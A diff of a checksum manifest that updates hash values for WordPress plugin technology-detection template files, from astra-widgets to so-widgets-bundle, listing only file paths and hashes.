http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:18ec876d0e4b0404ca5650d6ba87cf9bf30faf3f -http/technologies/wordpress/plugins/backwpup.yaml:3e7c70d589c265eafcd9a598b4c1ae79d1dedf3e -http/technologies/wordpress/plugins/better-search-replace.yaml:693592eaf5badf4f412417951e15b456fc488294 -http/technologies/wordpress/plugins/better-wp-security.yaml:158e86629c4d67a29d60f802f1e293ddcdd2e576 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:1e04cf0e900ffad1f109cc7a0c2739099aa85470 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:39c92ef0fa3d4208b26e7389f47d97b9dc25fa05 -http/technologies/wordpress/plugins/breeze.yaml:011bab668295bdc97fcaefc417c8fba3221a7f07 -http/technologies/wordpress/plugins/broken-link-checker.yaml:5003e452889b0f738b14ee1420944b2288b6e996 -http/technologies/wordpress/plugins/chaty.yaml:39c3dd5785e9e8091443c628d340f95870fcbf22 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:ca5f7fddd0ff0cf926791c592bdea137fe52813f -http/technologies/wordpress/plugins/classic-editor.yaml:a2bb1a7615d1e16f680b124ee1698e320d348101 -http/technologies/wordpress/plugins/classic-widgets.yaml:09369b35177b15e9effbe11495feba8fd0194c0e -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e5b4a79a7a12a16ff3522723149892f8143a9ccf +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:8f356781b0c6f60c84800edfef3d297e6fedac13 -http/technologies/wordpress/plugins/coblocks.yaml:21466ff13da33db1ed0a12245f8c1cdfe5571c93 -http/technologies/wordpress/plugins/code-snippets.yaml:f00c9620bb5f5c1628a1e990431f3610e04bbc08 -http/technologies/wordpress/plugins/coming-soon.yaml:eb264fdfa1582b57d383fb29f0ac4e32185a4156 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:0b4d7cd050e6eef73b7b0746d03b3f26dc1793de -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:bb136d72c0a23f9da731f40c98d53498428d4d42 -http/technologies/wordpress/plugins/contact-form-7.yaml:16cfe7fb7fa0edb3ee7ba353a2f2f16a3936ad08 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:c1afab529d3e962c0326bf3f6c04584c7698c576 -http/technologies/wordpress/plugins/cookie-law-info.yaml:e4f18a649dcc131f5fc9dc8b99691e8097b341e0 -http/technologies/wordpress/plugins/cookie-notice.yaml:42a4e3f4aeea8e29c796360d65436661ff6eee02 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:485d6b2d46344ae950b628203713f9b99c0d1b70 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b3fc48e6d7f84c27712fdf7b7184036421d1a1f3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:1de9232d645f8f8ab903ce3b98e23be8d2bd8f46 -http/technologies/wordpress/plugins/custom-css-js.yaml:6a8517d76a9285f725f484611156cf7b4a94c5dd -http/technologies/wordpress/plugins/custom-fonts.yaml:5233af35c176fb81de0987b7d990fe847280375c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:962a516457ef2d168867b8a8e389f46aa5722355 -http/technologies/wordpress/plugins/disable-comments.yaml:d703ead0cccc639c55d875c43bf4b284b016b5d9 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:d795991385be7b003655fe296fb894a7a9eaceac -http/technologies/wordpress/plugins/duplicate-page.yaml:270a67913b87b96095ab292df47dd79593259b39 -http/technologies/wordpress/plugins/duplicate-post.yaml:8541b4f219bff5af4a38bd8036a1848a7c305b2f -http/technologies/wordpress/plugins/duplicator.yaml:ca505fad84fd7e76ff38c107ee87c5a5211cf617 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:7dd68e2bc5d3e7f9e811180eabc75de75d93e64a +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:39f2cda7226c70e0826d562bb89ad8c0f760e67d -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:a1b27312856f2086c164bc3675f01182f0cedf57 -http/technologies/wordpress/plugins/elementor.yaml:30cea111c3825610880ad65dbe200e49fd600069 -http/technologies/wordpress/plugins/elementskit-lite.yaml:881d5a2dc1b98160cff8d3e294f26ae14eeaae7c -http/technologies/wordpress/plugins/enable-media-replace.yaml:05a30d6aab1d34d80f461603f1f2afdf892b1b7b -http/technologies/wordpress/plugins/envato-elements.yaml:7832ff853d622bfc6b7cadab29a827ef3cbd4297 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:bbadddcc15a21cb6df46656eb827e03e5e307c12 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:4a95e18a2b08b41359a90e35be582d97997bdece -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:c8314bf4b050f3d4efea10042fd3ab58327e3880 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:925c51f8799ee427f58415321c9af2d3f25f8970 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:c30c43c11707053ec5b2ce4b4fcd7185873de9ef -http/technologies/wordpress/plugins/flamingo.yaml:2d551553838a8d84666aaa0a202f9b2faad2743d -http/technologies/wordpress/plugins/fluentform.yaml:6275e0845d8decc23fcf50d42b8ca2f14ba00fea -http/technologies/wordpress/plugins/font-awesome.yaml:f24a1db1dd21796aeb3ba2e50bc1063686dddd6c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6961fa2e30b8576eaf4f2ee8a255cf513f7ddec4 -http/technologies/wordpress/plugins/formidable.yaml:f1bd461de526addeee85b9f926da7634c250c041 -http/technologies/wordpress/plugins/forminator.yaml:7160b4865b0549f5bbb4f79be209bbb3d9ce2b9a -http/technologies/wordpress/plugins/ga-google-analytics.yaml:55ba408567d497d46156750e38e607091bc15ab3 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:181b06a305c96a16714411569b08d0e2291b4035 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:f99f54e65b0792a3b9d42ae312a695146c25f673 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:37db5bcdd61dbaaf8164482f195d5ed4af5bc629 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:faf94162127afa8d863cd0dcf5605899b97105e8 -http/technologies/wordpress/plugins/google-site-kit.yaml:85906b13a43595f0d9126c63872516dd83062a26 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:182794b9602a4f5b33baf8d37eab1c70eca52b99 -http/technologies/wordpress/plugins/gtranslate.yaml:55d22ad1448bd8cf0532aaa4ed1f36b443f62203 -http/technologies/wordpress/plugins/gutenberg.yaml:4ee6aac103c4b896ae47c3b4882427dfeba45eb3 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:484d4d318315a9b094a2a81f3c44eb33261c41f0 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:fa7b84a46f5fb575dddedb7c486d2adbaafcde17 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:4d21952b916b194e828ed3cd60e13ff3528d6786 -http/technologies/wordpress/plugins/header-footer.yaml:69172dcc2f8d8b94407e93b071d0c7d7b11c9f6f -http/technologies/wordpress/plugins/health-check.yaml:0d3f8ad6f9818c3b9fc5834f5c46d0f42a52b72b -http/technologies/wordpress/plugins/hello-dolly.yaml:fb5b66126726747e9318c33b63b310c19ed55c6f -http/technologies/wordpress/plugins/host-webfonts-local.yaml:3d50940fa537e4857a59ae2861b0f85bb079e579 -http/technologies/wordpress/plugins/hostinger.yaml:c5c02274bb041901eb18f1fbed64e8ce027c84f2 -http/technologies/wordpress/plugins/image-optimization.yaml:a95462f9e94f795179db16fd251ef70dd866d817 -http/technologies/wordpress/plugins/imagify.yaml:f62a5df95cbbb28811ebb8afb3aaecf2a87d851f -http/technologies/wordpress/plugins/imsanity.yaml:1a7c472de1b562a8937f013004547e0dc4bb6c9d -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:3e012b09cd2e38093cbd4142d347861577356571 -http/technologies/wordpress/plugins/instagram-feed.yaml:a18fef5df70be71707ff08a91541c94a8287f31e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:6f146b7d8f15b0f4d5f5236d6bb9af8c05a2e2a7 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:ede984b4ce734efb80a4e76739cf7ab928759029 -http/technologies/wordpress/plugins/jetpack.yaml:722cfb18d959aafb8afc26c43ea5f1b9310e8ab4 -http/technologies/wordpress/plugins/kadence-blocks.yaml:dd88425752a11b8d27b65ff567fd5c7f5106e78f -http/technologies/wordpress/plugins/kirki.yaml:3e9b6be1c0c47a91c3ffd76853adbd854fec95b1 -http/technologies/wordpress/plugins/leadin.yaml:282ecda7ae4100485836e43caeae5388ab948606 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:87f3beae65c6f66a4ec477c7b9e558992daa5d3c -http/technologies/wordpress/plugins/limit-login-attempts.yaml:4c3c3da712a1507e644a8a619c31a1ddbec76b20 -http/technologies/wordpress/plugins/litespeed-cache.yaml:b0007a8b0e38ecec8766a35500bbc9a165bb5ae9 -http/technologies/wordpress/plugins/loco-translate.yaml:24d49706c8f3b2f7f3604850dfa7dce830d66cb7 -http/technologies/wordpress/plugins/loginizer.yaml:4d9c60f412eaf2e57c8d8614d4ceca82d54af8e5 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:c4bef61dda972f757c550a00b2fe5b50a0de3784 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:22c3c5417d4c8af8a89212aa6ac07a10e71a7732 -http/technologies/wordpress/plugins/mailpoet.yaml:67e27cb5bc2df5693075cf7a9b409c15055fe912 -http/technologies/wordpress/plugins/maintenance.yaml:fabddd6496243a1e21c704ab5b963760c37f1780 -http/technologies/wordpress/plugins/mainwp-child.yaml:9138156d8a2c7be8dcdaf06c5276347befae11c5 -http/technologies/wordpress/plugins/malcare-security.yaml:fdc06e0d715b26710f962088603a001ad5daa995 -http/technologies/wordpress/plugins/megamenu.yaml:75cefa3626597f13c637cda840fb78b2b4ff8ff1 -http/technologies/wordpress/plugins/members.yaml:8b3e2ee51aede3fa700b6858b3cdd6e982c3a841 -http/technologies/wordpress/plugins/meta-box.yaml:c324d861c8109f098a3d60d93ced4a9a18fec695 -http/technologies/wordpress/plugins/metform.yaml:92fd715d65f49ae60d11864e885a4ea8bdcffb60 -http/technologies/wordpress/plugins/ml-slider.yaml:7a96f603d51a0234b7ab39b364d3c7d8b8269c5a -http/technologies/wordpress/plugins/newsletter.yaml:0bc7ede2432ce5062414e91cbf31b4b57f08fd2b -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:2259f3e681019c6343762f6ed56343b061ca49b7 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:87ca6a94e7bffc305bf42bf5e92a72d382038897 -http/technologies/wordpress/plugins/ninja-forms.yaml:7d56c3ddcf42b2d521ecd570362adc6ceb12a8f1 -http/technologies/wordpress/plugins/ocean-extra.yaml:cda378e05af15537da466c7b4debeca5d6909d9c -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:8fc3c31ef5b912595c019787c1c88b06055e98ea -http/technologies/wordpress/plugins/one-click-demo-import.yaml:1b804e49cb1a289cea3b0fab6ecfef080bc79d3e -http/technologies/wordpress/plugins/optinmonster.yaml:1b08e516a103695be4f114bc2c70a776e077ea61 -http/technologies/wordpress/plugins/otter-blocks.yaml:639dc2eb19a0d30e36356b35e5b98d5140349538 -http/technologies/wordpress/plugins/password-protected.yaml:ebe6fdd554f6855d619bd98d76dbccbe744ef2e3 -http/technologies/wordpress/plugins/pdf-embedder.yaml:1b728679886b496441f8e421263e6dd5292f96de +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:98b6dfc3b57c003d57d99b95bf516b9bcadad493 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f6965469b1c2ed0b7d4f3598eb2245f995fd0166 -http/technologies/wordpress/plugins/polylang.yaml:3082c4cccd71c6b020335333f985cd0a3a47f5d9 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:accba860c0824f01d73fab87c911b44c66491dd2 -http/technologies/wordpress/plugins/post-smtp.yaml:86079bfd82ecfe05f41a5f72fa55cce0c153f51e -http/technologies/wordpress/plugins/post-types-order.yaml:45b448df3710b39ed379314e288955a99194df55 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:08f6f1b761ff7eb4b93386a99ee263974c4ab704 -http/technologies/wordpress/plugins/pretty-link.yaml:ac78db275c6b93f2434055c928ef683ec5ad3587 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:8c58860bcef80599d8debd9751d880fe568828e5 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:5cc74a48b304b9e26cbeca26c84824faa7d77aa2 -http/technologies/wordpress/plugins/redirection.yaml:26d61bc05da848467438faacb28d0bfa9365cbb8 -http/technologies/wordpress/plugins/redux-framework.yaml:797ee7403fd614a538a27ce6842b1613cafe3585 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:aa5603a52170fc69e7cca53a9d054559e975d8df -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:d9d3ffe0d24c630d16cbf412b64c3db5a09e2697 -http/technologies/wordpress/plugins/safe-svg.yaml:347046db30ffa1db289a09ef4bad92131b7dc9d5 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:f411765e462ad03d66a43c62850b0e9732443c2b -http/technologies/wordpress/plugins/sg-cachepress.yaml:2606734d6dbbf985724b8dc77beca23281bdde99 -http/technologies/wordpress/plugins/sg-security.yaml:1f92f9c936f155c015ea2777b67cf07a536129b0 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a56a0df9a39978ad72f16140a410a9152f8a5edf -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:162b72837807ccd1d4bf18e54e51a491c876e235 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:4debc7be05869829a4ddbafd1408b9dfc3ec3d1f -http/technologies/wordpress/plugins/simple-history.yaml:cf14c9dbcd5a2823b27abbb7f8013927d929aba9 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:aafe30b072ef77b59fd0c8adf8b689b8a8b534ea -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc15dcea1fcffcf1cd2d7480850750572aefe76f -http/technologies/wordpress/plugins/smart-slider-3.yaml:b7d2a0f1e58ffdb59602c82d93d8ec16f4f74c04 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:cf7a0e594a67d9bf3495083c65ad3dd696091b0d 